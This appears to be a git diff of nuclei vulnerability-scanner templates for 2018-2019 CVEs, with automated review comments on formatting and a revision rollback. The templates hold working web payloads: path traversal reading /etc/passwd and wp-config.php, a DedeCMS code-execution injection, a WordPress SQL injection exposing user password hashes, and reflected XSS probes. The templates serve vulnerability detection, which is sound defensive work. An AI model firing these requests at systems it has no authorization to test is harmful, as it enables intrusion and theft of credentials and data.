http://www.projectxit.com.au/blog/2018/2/27/axxonsoft-client-directory-traversal-cve-2018-7467-axxonsoft-axxon-next-axxonsoft-client-directory-traversal-via-an-initial-css2f-substring-in-a-uri-cve-2018-7467 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-7467 - cwe-id: CWE-200 - tags: cve,cve2018,axxonsoft,lfi -requests: + cwe-id: CWE-22 + epss-score: 0.00396 + epss-percentile: 0.70586 + cpe: cpe:2.3:a:axxonsoft:next:-:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: axxonsoft + product: next + tags: axxonsoft,lfi,packetstorm,cve,cve2018 + +http: - raw: - |+ GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini HTTP/1.1 
@@ -29,3 +41,4 @@ requests: - "fonts" - "extensions" condition: and +# digest: 4b0a00483046022100f83145a695e4e24918f2a88e8610b423274c5b556d5c39381a17c01fa4c3fd53022100a94793340e007e0749843872e4f960d65067d383d56c76edeecd880b6255b41f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-7700.yaml b/poc/cve/CVE-2018-7700.yaml index 32b525bf7f..bc0ac258ef 100644 --- a/poc/cve/CVE-2018-7700.yaml +++ b/poc/cve/CVE-2018-7700.yaml 
@@ -1,33 +1,43 @@ id: CVE-2018-7700 info: - name: DedeCMS V5.7SP2 RCE + name: DedeCMS 5.7SP2 - Cross-Site Request Forgery/Remote Code Execution author: pikpikcu severity: high - reference: https://laworigin.github.io/2018/03/07/CVE-2018-7700-dedecms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/ - tags: cve,cve2018,dedecms,rce + description: | + DedeCMS 5.7SP2 is susceptible to cross-site request forgery with a corresponding impact of arbitrary code execution because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code. + remediation: | + Apply the latest security patches and update to a newer version of DedeCMS. + reference: + - https://laworigin.github.io/2018/03/07/CVE-2018-7700-dedecms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-7700 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 8.80 + cvss-score: 8.8 cve-id: CVE-2018-7700 cwe-id: CWE-352 - description: "DedeCMS 5.7 has CSRF with an impact of arbitrary code execution, because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code." 
+ epss-score: 0.73235 + epss-percentile: 0.97792 + cpe: cpe:2.3:a:dedecms:dedecms:5.7:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: dedecms + product: dedecms + tags: cve,cve2018,dedecms,rce -requests: +http: - method: GET path: - - "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}" + - "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}" matchers-condition: and matchers: - - type: word - words: - - "phpinfo" - - "PHP Version" part: body - condition: and + words: + - "4cc32a3a81d2bb37271934a48ce4468a" - type: status status: - 200 +# digest: 4a0a00473045022100a4f8a8a6740cff631691b7f4c46021292ab835ae16b491127abc5d4f06d0bdce0220647f440bc89ff24250a3535ec7888ab3af66dacb94e3cb9d23ef1ec1bb4245fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-9118.yaml b/poc/cve/CVE-2018-9118.yaml index f05f5ad51d..a56feb3899 100644 --- a/poc/cve/CVE-2018-9118.yaml +++ b/poc/cve/CVE-2018-9118.yaml 
@@ -6,29 +6,21 @@ info: severity: high description: | WordPress 99 Robots WP Background Takeover Advertisements 4.1.4 is susceptible to local file inclusion via exports/download.php. - remediation: | - Upgrade to 4.1.15. reference: - https://www.exploit-db.com/exploits/44417 - https://wpvulndb.com/vulnerabilities/9056 - https://99robots.com/docs/wp-background-takeover-advertisements/ - https://nvd.nist.gov/vuln/detail/CVE-2018-9118 + remediation: | + Upgrade to 4.1.15. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-9118 cwe-id: CWE-22 - epss-score: 0.08219 - epss-percentile: 0.93692 - cpe: cpe:2.3:a:99robots:wp_background_takeover_advertisements:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: 99robots - product: wp_background_takeover_advertisements - framework: wordpress - tags: edb,cve,cve2018,wordpress,wp-plugin,lfi,traversal,wp + tags: cve,cve2018,wordpress,wp-plugin,lfi,traversal,wp -http: +requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php' @@ -44,4 +36,4 @@ http: - "The base configurations of the WordPress" condition: and -# digest: 4a0a00473045022100c1193dffdd7acc16d3f43a76448ac6ef9a5eee0bca32df86cb3fd32c04a8e91b02204437235d21ab0b57daf0582ddd576c27ade92a87c0dbfd8735729239d6d2f295:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/06/15 diff --git "a/poc/cve/CVE-2018\342\200\22314064.yaml" "b/poc/cve/CVE-2018\342\200\22314064.yaml" index d07fc4a0b2..68796ed2a0 100644 --- "a/poc/cve/CVE-2018\342\200\22314064.yaml" +++ "b/poc/cve/CVE-2018\342\200\22314064.yaml" 
@@ -1,21 +1,26 @@ id: cve-2018-14064 + info: name: VelotiSmart Wifi - Directory Traversal author: 0x_Akoko severity: high reference: | - - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac - - https://www.exploit-db.com/exploits/45030 + - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac + - https://www.exploit-db.com/exploits/45030 tags: velotismart,lfi + requests: - method: GET path: - "{{BaseURL}}/../../etc/passwd" + matchers-condition: and matchers: + - type: regex regex: - "root:[x*]:0:0" + - type: status status: - 200 diff --git a/poc/cve/CVE-2019-1010287.yaml b/poc/cve/CVE-2019-1010287.yaml index b1afc71348..21a1db6c7b 100644 --- a/poc/cve/CVE-2019-1010287.yaml +++ b/poc/cve/CVE-2019-1010287.yaml 
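Review bot: The `reference: |` block scalar in this file's `info:` section is only re-indented by the hunk, so the two URLs still parse as one literal string rather than a list, unlike the other templates in this commit. I would drop the `|` and write `reference:` followed by `  - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac` and `  - https://www.exploit-db.com/exploits/45030`. The `info:` block shown in the hunk also has no `description:` or `classification:`, so a hit gives a triager no CVSS or CWE context. The file name uses a non-ASCII dash (`CVE-2018\342\200\22314064.yaml`) while the `id:` uses a plain hyphen, which makes the template easy to miss when searching by CVE number.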
@@ -1,23 +1,33 @@ id: CVE-2019-1010287 + info: - name: Timesheet 1.5.3 - Cross Site Scripting + name: Timesheet Next Gen <=1.5.3 - Cross-Site Scripting author: pikpikcu severity: medium - description: 'Timesheet Next Gen 1.5.3 and earlier is affected by: Cross Site Scripting (XSS). The impact is: Allows an attacker to execute arbitrary HTML and JavaScript code via a "redirect" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url.' + description: 'Timesheet Next Gen 1.5.3 and earlier is vulnerable to cross-site scripting that allows an attacker to execute arbitrary HTML and JavaScript code via a "redirect" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url.' + remediation: | + Upgrade to a patched version of Timesheet Next Gen (1.5.4 or above) that properly sanitizes user input to prevent XSS attacks. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-1010287 - http://www.mdh-tz.info/ - https://sourceforge.net/p/tsheetx/discussion/779083/thread/7fcb52f696/ - https://sourceforge.net/p/tsheetx/code/497/tree/branches/legacy/login.php#l40 + - https://nvd.nist.gov/vuln/detail/CVE-2019-1010287 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-1010287 cwe-id: CWE-79 + epss-score: 0.00129 + epss-percentile: 0.47471 + cpe: cpe:2.3:a:timesheet_next_gen_project:timesheet_next_gen:*:*:*:*:*:*:*:* metadata: - google-dork: inurl:"/timesheet/login.php" + max-request: 1 + vendor: timesheet_next_gen_project + product: timesheet_next_gen + google-query: inurl:"/timesheet/login.php" tags: cve,cve2019,timesheet,xss -requests: + +http: - raw: - | POST /timesheet/login.php HTTP/1.1 
@@ -25,12 +35,15 @@ requests: Content-Type: application/x-www-form-urlencoded username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word + part: body words: - '>' - part: body + + - type: status + status: + - 200 +# digest: 4a0a00473045022100a05d1b81b235ac788d5cd2ed9b52e87b7ccf222d1d9287a834d56ad8052eac7402207d62b63a9b598b84557029354b23ab5402e5e020f04aae3f3573ff175c5eb812:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-10692.yaml b/poc/cve/CVE-2019-10692.yaml index 66751d09e7..7064f774fd 100644 --- a/poc/cve/CVE-2019-10692.yaml +++ b/poc/cve/CVE-2019-10692.yaml 
@@ -1,22 +1,39 @@ id: CVE-2019-10692 + info: - name: WP Google Maps < 7.11.18 - Unauthenticated SQL Injection + name: WordPress Google Maps <7.11.18 - SQL Injection author: pussycat0x severity: critical description: | - In the wp-google-maps plugin before 7.11.18 for WordPress, - includes/class.rest-api.php in the REST API does not sanitize field names - before a SELECT statement. + WordPress Google Maps plugin before 7.11.18 contains a SQL injection vulnerability. The plugin includes /class.rest-api.php in the REST API and does not sanitize field names before a SELECT statement. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update to the latest version of the WordPress Google Maps plugin (7.11.18 or higher). reference: - https://wpscan.com/vulnerability/475404ce-2a1a-4d15-bf02-df0ea2afdaea + - https://wordpress.org/plugins/wp-google-maps/#developers + - https://plugins.trac.wordpress.org/changeset?old_path=%2Fwp-google-maps&old=2061433&new_path=%2Fwp-google-maps&new=2061434&sfp_email=&sfph_mail=#file755 - https://nvd.nist.gov/vuln/detail/CVE-2019-10692 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-10692 + cwe-id: CWE-89 + epss-score: 0.9737 + epss-percentile: 0.99884 + cpe: cpe:2.3:a:codecabin:wp_go_maps:*:*:*:*:*:wordpress:*:* metadata: verified: true - tags: cve,cve2019,sqli,wp,wordpress,wp-plugin,unauth,googlemaps -requests: + max-request: 1 + vendor: codecabin + product: wp_go_maps + framework: wordpress + tags: cve,cve2019,wp,wp-plugin,unauth,sqli,wordpress,googlemaps,wpscan + +http: - method: GET path: - "{{BaseURL}}/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-" + matchers-condition: and matchers: - type: word 
@@ -26,10 +43,14 @@ requests: - '"user_pass"' - '"user_nicename"' condition: and + - type: word part: header words: - application/json + - type: status status: - 200 + +# digest: 4a0a0047304502205c241d4f1facd76bdfde37c8340bcaa0a5c3ba34416411d6f6da7b8c4ff982c6022100b91a025afcafc53b47ce443d8a9d069bc98738ff8ed3f0a695085d457c8f86ff:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2019-11013.yaml b/poc/cve/CVE-2019-11013.yaml index ea7a0c390c..259b5328b9 100644 --- a/poc/cve/CVE-2019-11013.yaml +++ b/poc/cve/CVE-2019-11013.yaml 
@@ -1,19 +1,43 @@ id: CVE-2019-11013 + info: - name: Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal + name: Nimble Streamer <=3.5.4-9 - Local File Inclusion author: 0x_Akoko - severity: high - reference: https://www.exploit-db.com/exploits/47301 - tags: cves,lfi,nimble -requests: + severity: medium + description: Nimble Streamer 3.0.2-2 through 3.5.4-9 is vulnerable to local file inclusion. An attacker can traverse the file system to access files or directories that are outside of the restricted directory on the remote server. + remediation: | + Upgrade Nimble Streamer to a version higher than 3.5.4-9 to mitigate the LFI vulnerability. + reference: + - https://www.exploit-db.com/exploits/47301 + - https://mayaseven.com/nimble-directory-traversal-in-nimble-streamer-version-3-0-2-2-to-3-5-4-9/ + - http://packetstormsecurity.com/files/154196/Nimble-Streamer-3.x-Directory-Traversal.html + - https://nvd.nist.gov/vuln/detail/CVE-2019-11013 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2019-11013 + cwe-id: CWE-22 + epss-score: 0.01775 + epss-percentile: 0.86632 + cpe: cpe:2.3:a:softvelum:nimble_streamer:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: softvelum + product: nimble_streamer + tags: cve2019,lfi,nimble,edb,packetstorm,cve + +http: - method: GET path: - "{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448" + matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" + - type: status status: - 200 +# digest: 490a0046304402203b64f755b15b429a19a030c7313204330fd5f76672cc711a074c3936886c765e0220060020d79879019138a5971d08be9ba7ea4836ac9e9b8213052451f74aa3bb09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-11248.yaml b/poc/cve/CVE-2019-11248.yaml index afd919791a..a5875ef6fe 100644 --- a/poc/cve/CVE-2019-11248.yaml +++ b/poc/cve/CVE-2019-11248.yaml 
@@ -6,8 +6,6 @@ info: severity: high description: | The debugging endpoint /debug/pprof is exposed over the unauthenticated Kubelet healthz port. This debugging endpoint can potentially leak sensitive information such as internal Kubelet memory addresses and configuration, or for limited denial of service. Versions prior to 1.15.0, 1.14.4, 1.13.8, and 1.12.10 are affected. The issue is of medium severity, but not exposed by the default configuration. - remediation: | - Disable or restrict access to the Debug Endpoint pprof to prevent unauthorized access. reference: - https://medium.com/bugbountywriteup/my-first-bug-bounty-21d3203ffdb0 - http://mmcloughlin.com/posts/your-pprof-is-showing @@ -18,17 +16,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L cvss-score: 8.2 cve-id: CVE-2019-11248 - cwe-id: CWE-862,CWE-419 - epss-score: 0.72895 - epss-percentile: 0.97787 - cpe: cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: kubernetes - product: kubernetes + cwe-id: CWE-862 tags: cve,cve2019,debug,kubernetes,kubelet,devops,unauth,disclosure -http: +requests: - method: GET path: - "{{BaseURL}}/debug/pprof/" @@ -42,4 +33,5 @@ http: - "Profile Descriptions" - "goroutine profile: total" condition: or -# digest: 4b0a00483046022100f3138a71f318261cc5ffdbe2da21b4fc35fc3eb91efd772f27a9c85bf0bb2233022100b1fff6f6653eb3e44f258d2b5584461d1a28b15e9c67570e691b00ae433a18e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/06/15 diff --git a/poc/cve/CVE-2019-11370.yaml b/poc/cve/CVE-2019-11370.yaml index f49444e499..58ffa77862 100644 --- a/poc/cve/CVE-2019-11370.yaml +++ b/poc/cve/CVE-2019-11370.yaml 
@@ -1,13 +1,10 @@ id: CVE-2019-11370 - info: - name: Carel pCOWeb \">') condition: and -# digest: 4a0a00473045022028df516082ade8c8963d2e5fb38be7ff08c12d135e15533316d6e6c8364ed714022100c2cfd1382946f92cac3de4c8b5e0e946c223afb691244cdb89fc6a202b9e1a60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-12276.yaml b/poc/cve/CVE-2019-12276.yaml index c59ef768ea..05e57f1ea3 100644 --- a/poc/cve/CVE-2019-12276.yaml +++ b/poc/cve/CVE-2019-12276.yaml 
@@ -1,34 +1,48 @@ -id: CVE-2019-12276 - -info: - name: GrandNode 4.40 - Path Traversal - author: daffainfo - severity: high - description: Path Traversal vulnerability in Controllers/LetsEncryptController.cs in LetsEncryptController in GrandNode 4.40 allows remote, unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. A patch for this issue was made on 2019-05-30 in GrandNode 4.40. - reference: - - https://security401.com/grandnode-path-traversal/ - - https://www.cvedetails.com/cve/CVE-2019-12276 - tags: cve,cve2019,lfi - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2019-12276 - cwe-id: CWE-22 - -requests: - - method: GET - path: - - "{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd" - headers: - Connection: close - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 +id: CVE-2019-12276 + +info: + name: GrandNode 4.40 - Local File Inclusion + author: daffainfo + severity: high + description: | + GrandNode 4.40 is susceptible to local file inclusion in Controllers/LetsEncryptController.cs, which allows remote unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. + remediation: | + A patch for this issue was made on 2019-05-30 in GrandNode 4.40. 
+ reference: + - https://security401.com/grandnode-path-traversal/ + - https://grandnode.com + - https://github.com/grandnode/grandnode + - https://nvd.nist.gov/vuln/detail/CVE-2019-12276 + - http://packetstormsecurity.com/files/153373/GrandNode-4.40-Path-Traversal-File-Download.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2019-12276 + cwe-id: CWE-22 + epss-score: 0.96216 + epss-percentile: 0.9938 + cpe: cpe:2.3:a:grandnode:grandnode:4.40:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: grandnode + product: grandnode + tags: packetstorm,cve,cve2019,lfi,grandnode + +http: + - method: GET + path: + - "{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd" + + headers: + Connection: close + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 +# digest: 4b0a00483046022100b725a68a71114229dcc98a941f1a278b86086a42a5d70f3ffc7747c34b2ad720022100ae5c1ac57b87a963be41411a5b8ef07fc9d5bd73e05298da2b719e722e73d181:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-12962.yaml b/poc/cve/CVE-2019-12962.yaml index 0be257a894..68f3eb808d 100644 --- a/poc/cve/CVE-2019-12962.yaml +++ b/poc/cve/CVE-2019-12962.yaml 
@@ -1,40 +1,55 @@ id: CVE-2019-12962 + info: - name: LiveZilla Server 8.0.1.0 - Cross Site Scripting + name: LiveZilla Server 8.0.1.0 - Cross-Site Scripting author: Clment Cruchet severity: medium description: | - LiveZilla Server 8.0.1.0 - Accept-Language Reflected XSS + LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting. + remediation: | + Upgrade to the latest version of LiveZilla Server or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/49669 - - https://nvd.nist.gov/vuln/detail/CVE-2019-12962 - https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/ - http://packetstormsecurity.com/files/161867/LiveZilla-Server-8.0.1.0-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2019-12962 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-12962 cwe-id: CWE-79 + epss-score: 0.20689 + epss-percentile: 0.95876 + cpe: cpe:2.3:a:livezilla:livezilla:*:*:*:*:*:*:*:* metadata: - shodan-query: http.html:LiveZilla verified: true - tags: cve,cve2019,livezilla,xss -requests: + max-request: 1 + vendor: livezilla + product: livezilla + shodan-query: http.html:LiveZilla + tags: xss,edb,packetstorm,cve,cve2019,livezilla + +http: - method: GET path: - '{{BaseURL}}/mobile/index.php' + headers: Accept-Language: ';alert(document.domain)//' + matchers-condition: and matchers: - type: word part: body words: - "var detectedLanguage = ';alert(document.domain)//';" + - type: word part: header words: - "text/html" + - type: status status: - 200 +# digest: 490a00463044022006157a23e52badbb8d85007f09e12cf0fcfc8746196fba7e0715dea88eab5b0202207830f34604c6defbb9601defe0f51d23712c329e02c864813ecfadf0a87ce25b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/poc/cve/CVE-2019-13101.yaml b/poc/cve/CVE-2019-13101.yaml index 3df83cb376..fc313615ee 100644 --- a/poc/cve/CVE-2019-13101.yaml +++ b/poc/cve/CVE-2019-13101.yaml @@ -1,33 +1,22 @@ id: CVE-2019-13101 info: - name: D-Link DIR-600M - Authentication Bypass author: Suman_Kar - severity: critical + name: D-Link DIR-600M Authentication Bypass description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page. - remediation: | - Update the router's firmware to the latest version provided by D-Link. + severity: critical reference: - https://github.com/d0x0/D-Link-DIR-600M - https://www.exploit-db.com/exploits/47250 - https://nvd.nist.gov/vuln/detail/CVE-2019-13101 - - https://us.dlink.com/en/security-advisory - - http://packetstormsecurity.com/files/153994/D-Link-DIR-600M-Wireless-N-150-Home-Router-Access-Bypass.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2019-13101 cwe-id: CWE-306 - epss-score: 0.03717 - epss-percentile: 0.90795 - cpe: cpe:2.3:o:dlink:dir-600m_firmware:3.02:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: dlink - product: dir-600m_firmware - tags: packetstorm,edb,cve,cve2019,dlink,router,iot + tags: cve,cve2019,dlink,router,iot -http: +requests: - raw: - | GET /wan.htm HTTP/1.1 @@ -36,13 +25,13 @@ http: matchers-condition: and matchers: - - type: word - part: body - words: - - "/PPPoE/" - - type: status status: - 200 -# digest: 4a0a00473045022100b34b6d784777c7bc7839f52f456cea0deeb6368c32b2fde7b990016172cf03fd02206ebf149631301f76efd08ba2dbe8308933c817fd6bba2ce7a2603c98f19be223:922c64590222798bb761d5b6d8e72950 + - type: word + words: + - "/PPPoE/" + part: body + +# Enhanced by mp on 2022/03/29 
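Review bot: The new side of CVE-2019-13101.yaml is an older revision of the template than the one it replaces: it returns to the legacy `requests:` key and drops the `remediation:` text, the `cpe`/`epss`/`metadata` fields and the trailing `# digest:` signature line. Without the digest, consumers that rely on nuclei's template signing can presumably no longer verify the file as an unmodified upstream template, which matters in a repository updated by an automated sync job. I would keep the old side's `http:` key, `remediation:` block and digest line, and have the sync only ever move forward in template revision. The same rollback appears in this commit for CVE-2019-16123, CVE-2019-16931, CVE-2019-17418, CVE-2019-19824, CVE-2019-20210, CVE-2019-20224, CVE-2019-2616 and CVE-2019-2767.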
diff --git a/poc/cve/CVE-2019-14251.yaml b/poc/cve/CVE-2019-14251.yaml index 9b1fec3938..d13e3a74fd 100644 --- a/poc/cve/CVE-2019-14251.yaml +++ b/poc/cve/CVE-2019-14251.yaml @@ -1,24 +1,36 @@ id: CVE-2019-14251 + info: - name: T24 in TEMENOS Channels R15.01 - Pre Authenticated Path Traversal + name: T24 Web Server - Local File Inclusion author: 0x_Akoko severity: high - description: An unauthenticated path traversal vulnerability was discovered permitting an attacker to exfiltrate data directly from the T24 web server. + description: T24 web server is vulnerable to unauthenticated local file inclusion that permits an attacker to exfiltrate data directly from server. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the T24 Web Server. reference: - https://github.com/kmkz/exploit/blob/master/CVE-2019-14251-TEMENOS-T24.txt - - https://www.cvedetails.com/cve/CVE-2019-14251 - https://vuldb.com/?id.146815 + - https://nvd.nist.gov/vuln/detail/CVE-2019-14251 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-14251 cwe-id: CWE-22 + epss-score: 0.01702 + epss-percentile: 0.86351 + cpe: cpe:2.3:a:temenos:t24:r15.01:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: temenos + product: t24 tags: cve,cve2019,temenos,lfi,unauth -requests: + +http: - method: GET path: - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd" - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini" + matchers-condition: and matchers: - type: regex @@ -26,6 +38,8 @@ requests: - "root:.*:0:0:" - "for 16-bit app support" condition: or + - type: status status: - 200 +# digest: 4a0a0047304502206a9235411040b6de7a04c484b4af189424705f1f5c73554a799bf113e2f9b422022100dd0463d775ab00326937037d0202d49ca7b4099817b83612ceb875b918fa0204:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/poc/cve/CVE-2019-15713.yaml b/poc/cve/CVE-2019-15713.yaml index 052732aa1e..d1342b61c3 100644 --- a/poc/cve/CVE-2019-15713.yaml +++ b/poc/cve/CVE-2019-15713.yaml @@ -1,21 +1,32 @@ id: CVE-2019-15713 info: - name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS) + name: WordPress My Calendar <= 3.1.9 - Cross-Site Scripting author: daffainfo,dhiyaneshDk severity: medium - description: The my-calendar plugin before 3.1.10 for WordPress has XSS. Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site. + description: WordPress plugin My Calendar <= 3.1.9 is susceptible to reflected cross-site scripting which can be triggered via unescaped usage of URL parameters in multiple locations throughout the site. + remediation: | + Update to the latest version of the My Calendar plugin (>= 3.1.10) or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://wpscan.com/vulnerability/9267 + - https://wordpress.org/plugins/my-calendar/#developers - https://nvd.nist.gov/vuln/detail/CVE-2019-15713 - tags: cve,cve2019,wordpress,xss,wp-plugin classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2019-15713 cwe-id: CWE-79 + epss-score: 0.00101 + epss-percentile: 0.41329 + cpe: cpe:2.3:a:my_calendar_project:my_calendar:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: my_calendar_project + product: my_calendar + framework: wordpress + tags: cve,cve2019,wordpress,xss,wp-plugin,wpscan -requests: +http: - method: GET path: - '{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' @@ -23,9 +34,9 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header 
@@ -35,3 +46,4 @@ requests: - type: status status: - 200 +# digest: 4a0a004730450220264abd00bc4d8e8aed3c23447e74bf6b83be0254846fa18367a0e73207f4ff54022100da988bad4910c89d69797f15bc5dc2dff9abe0c272d68c8babe858f9594afc77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-16123.yaml b/poc/cve/CVE-2019-16123.yaml index c4a63a1fc6..5868d97896 100644 --- a/poc/cve/CVE-2019-16123.yaml +++ b/poc/cve/CVE-2019-16123.yaml @@ -1,39 +1,27 @@ id: CVE-2019-16123 - info: - name: PilusCart <=1.4.1 - Local File Inclusion + name: PilusCart <= 1.4.1 - Local File Disclosure author: 0x_Akoko severity: high - description: | - PilusCart versions 1.4.1 and prior suffer from a file disclosure vulnerability via local file inclusion. - remediation: | - Upgrade to a patched version of PilusCart (>=1.4.2) or apply the vendor-supplied patch to mitigate the LFI vulnerability. + description: PilusCart versions 1.4.1 and below suffers from a file disclosure vulnerability. reference: - https://packetstormsecurity.com/files/154250/PilusCart-1.4.1-Local-File-Disclosure.html - - https://www.exploit-db.com/exploits/47315 - - https://nvd.nist.gov/vuln/detail/CVE-2019-1653 - - https://zerodays.lol/ + - https://www.cvedetails.com/cve/CVE-2019-16123 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-16123 cwe-id: CWE-22 - epss-score: 0.72953 - epss-percentile: 0.97788 - cpe: cpe:2.3:a:kartatopia:piluscart:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: kartatopia - product: piluscart - tags: piluscart,lfi,packetstorm,edb,cve,cve2019 + tags: cve,cve2019,piluscart,lfi -http: +requests: - method: GET path: - "{{BaseURL}}/catalog.php?filename=../../../../../../../../../etc/passwd" matchers-condition: and matchers: + - type: regex regex: - "root:[x*]:0:0" 
